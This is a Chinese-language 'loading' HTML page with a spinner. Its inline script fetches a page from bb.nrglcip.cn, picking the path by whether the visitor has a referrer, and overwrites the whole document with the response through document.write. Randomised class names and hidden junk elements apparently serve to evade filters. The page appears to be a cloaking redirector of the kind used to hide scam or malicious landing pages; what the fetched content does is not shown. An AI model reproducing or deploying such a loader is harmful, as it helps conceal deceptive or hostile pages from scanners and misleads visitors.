<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YtG2bbUQq5D {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YtG2bbUQq5D .U1s3kJWdr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YtG2bbUQq5D .content {
            line-height: 50px;
            text-align: center
        }

        .YtG2bbUQq5D .img {
            width: 100%
        }

        .YtG2bbUQq5D .G2OAXolo {
            text-align: center
        }

        .YtG2bbUQq5D .G2OAXolo span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YtG2bbUQq5D .G2OAXolo span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YtG2bbUQq5D .G2OAXolo span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YtG2bbUQq5D .G2OAXolo span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YtG2bbUQq5D .G2OAXolo span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YtG2bbUQq5D .G2OAXolo span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YtG2bbUQq5D .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function EY020KdgGgBT4(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var NoUkMM3 = EY020KdgGgBT4('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ NoUkMM3 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ NoUkMM3 +".html?a=share";
		}
		
        Dx9Wrt=url+"#"+new Date().getTime();
        Dx9Wrt && function() {
            $.get(Dx9Wrt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >YvBVTgGHbnsCN1VfcHm2FS424AJM8qylznY7BtHaxLtFLqMhNhbrTFOIgtJhX6PXsB7y1HmJXYh9rwCm50BupbDmn</b>
<span style='display:none'>pDQMwtOWdqGil6unQYbwpCFOsUJbeGVdXYnQyIL7bFbqVidi4PgKkGl1sbHcH2VwbAqezjAf4nJjyjhsW3p4OSd3oNip</span>
<h1 style='display:none' >NJ3x1a39P62s6LhGTP7nYaUmKmmHmIYaIY</h1>
<a  href='#' style='display:none'>Bpm8r3jQdZOborfAK1IKlB</a>
<div style='display:none'>WuPLIEpxELkCeO1wXYL5784DLYe8Oy7O2ufQQVEWneylE4k6IOXgIvRYGpc5HSnuYW4</div>
<li style='display:none' >nl7LgPBcNlL5UqYVltVFoWknQn5bLSkOFKrpOPJ9A1kn3AAXsk5BnosT5xNwdvOCc5KGxLVvdC8YlsWDeqLKpFnea</li><div class="YtG2bbUQq5D">
    <div class="U1s3kJWdr">
        <div class="G2OAXolo">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >fucrokCNQ387CIgYtzh5WJp4CF4cOFwd7KzrOKKFHhEod</li>
<h1 style='display:none' >EEyfLYNt1KDIYHzY2zukjGqMJAT64d7n2Ic1mZwttF</h1>
<li style='display:none' >fucrokCNQ387CIgYtzh5WJp4CF4cOFwd7KzrOKKFHhEod</li>
<li style='display:none' >fucrokCNQ387CIgYtzh5WJp4CF4cOFwd7KzrOKKFHhEod</li>
<span style='display:none'>gc3vbTwQOuaRYscJB0HNORBMsGoH3CBoMIANSNP3DBs0w3zF0I2uEUsnDrrzLxJ8yWYINANKKYmgPKZc5wSafYNkj1aguUOraSt3a</span></body>
</html>